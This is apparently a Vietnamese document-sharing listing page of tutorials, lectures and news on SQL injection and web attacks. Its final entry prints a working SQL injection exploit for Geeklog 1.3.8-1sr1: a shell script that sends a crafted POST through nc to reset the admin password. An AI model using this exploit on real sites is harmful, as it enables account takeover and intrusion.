Khai thác SQL Injection

Bài giảng An ninh mạng - Bài 10: An toàn dịch vụ web - SQL injection, XSS, CSRF. Bài này cung cấp cho sinh viên những nội dung gồm: tấn công dạng command injection; phòng chống; kịch bản tấn công SQLi; phân tích truy vấn trên cây cú pháp; tautology-based SQLi; cây cú pháp; một số kỹ thuật khai thác SQLi;... Mời các bạn cùng tham khảo!

31p codabach1016 03-05-2024 11 5   Download

Tài liệu tham khảo môn Thực hành Bảo mật web và ứng dụng trình bày nội dung về Khai thác Web SOP; Web Tracking; Tấn công CSRF, Tấn công Cross - Site Scripting (XSS), SQL Injection Attack, Bảo mật lập trình Java. Kính mời quý đọc giả tham khảo nội dùn chi tiết.

119p redrose24 07-04-2022 51 8   Download

Nhằm giúp các bạn có thêm tài liệu phục vụ nhu cầu học tập và nghiên cứu về Công nghệ thông tin, mời các bạn cùng tham khảo nội dung tài liệu "Hướng dẫn cơ bản khai thác SQL Injection đối với MySQL". Tài liệu hướng dẫn cụ thể chi tiết các bước, mời các bạn cùng tham khảo.

3p iamok147 19-09-2015 67 7   Download

Tài liệu Hướng dẫn khai thác SQL Injection đối với MySQL giới thiệu một cách chi tiết và dễ hiểu về cách khai thác SQL Injection đối với MySQL. Đây là tài liệu hữu ích với những bạn chuyên ngành Công nghệ thông tin và những bạn quan tâm tới lĩnh vực này, mời các bạn tham khảo.

3p iamok147 13-05-2015 128 18   Download

Tài liệu Hướng dẫn hack website lỗi SQL cơ bản trình bày các nội dung: hướng dẫn hack website lỗi SQL cơ bản, ack Site Lỗi SQL Cơ Bản, hướng dẫn hack site lỗi SQL bị chặn xuất hiện “406 Not Acceptable", ướng dẫn hack site lỗi 403 - 404 Forbidden, một số lưu ý khi khai thác SQL - Ducdung.08clc, SQL injection (SQLi) Tutorial series part-1.

29p nhaapolo 23-04-2014 488 59   Download

Hàng trăm nghìn trang web bị tấn công .Theo thông tin mới nhất từ BBC, hàng trăm nghìn trang web đã bị tấn công theo cách thức SQL Injection. Patrik Runald, trưởng ban nghiên cứu an ninh tại hãng bảo mật Websense cho biết quy mô cuộc tấn công là "rất đáng lo ngại". Phần mềm giả mạo “Windows Stability Center” được cài đặt tự động lên máy nạn nhân sau khi truy cập trang web của bọn tin tặc. (Ảnh minh họa: Websense.com) .Bọn tội phạm công nghệ cao đã sử dụng một thủ thuật tấn công thường thấy, vốn khai thác...

5p yeutinh98 19-09-2012 96 8   Download

Các lỗ hổng của bộ Microsoft Office .Các lỗ hổng của bộ Microsoft Office được phát hiện gần đây đặt ra cho chúng ta vấn đề cần phải hiều cơ chế kiến trúc bảo mật của MS Office và những điểm yếu dễ bị khai thác. Trong bài này chúng tôi sẽ nói về cơ chế lưu trữ có cấu trúc OLE (OLE Structured Storage) của Microsoft Office, sự xuất hiện tự nhiên của các chương trình dropper gần đây và một số tác nhân phá hoại khác. Bài này nằm trong nỗ lực nghiên cứu hoạt động của một số...

16p conquynho32 14-09-2012 79 13   Download

Mini MySqlat0r được viết bằng java mà làm cho nó di động đến bất kỳ nền tảng có một java môi trường như Windows, Linux và những người khác. Với sự giúp đỡ của một giao diện người dùng đơn giản, đồ họa, phát hiện và khai thác các lỗ hổng SQL injection là rất thuận lợi.

7p m3onh0x84 10-04-2011 90 8   Download

introduction What is SQL? SQL (pronounced "ess-que-el") stands for Structured Query Language. SQL is used to communicate with a database. According to ANSI (American National Standards Institute), it is the standard language for relational database management systems. SQL statements are used to perform tasks such as update data on a database, or retrieve data from a database. Some common relational database management systems that use SQL are: Oracle, Sybase, Microsoft SQL Server, Access, Ingres, etc.

23p d15tmt 31-03-2011 186 32   Download

Sql Injection Exploit Code hack site Geeklog version 1.3.8-1sr1 Đôi nét về greedlog.net http://www.geeklog.net/ Đây là một dạng portal download free dùng rất nhiều cho site tin tức vvvv khá phổ biến. Lỗi sql injection được tìm thấy trong file users.php 2.code khai thác Exploit: #!/bin/sh echo "POST /path/to/gl/users.php HTTP/1.0 Content-length: 50 Content-type: application/x-www-form-urlencoded mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1&" | nc localhost 80 This should change the Admin user's password to "new". You have to change the /path/to/gl/users.

2p tt1991tt 20-02-2011 239 68   Download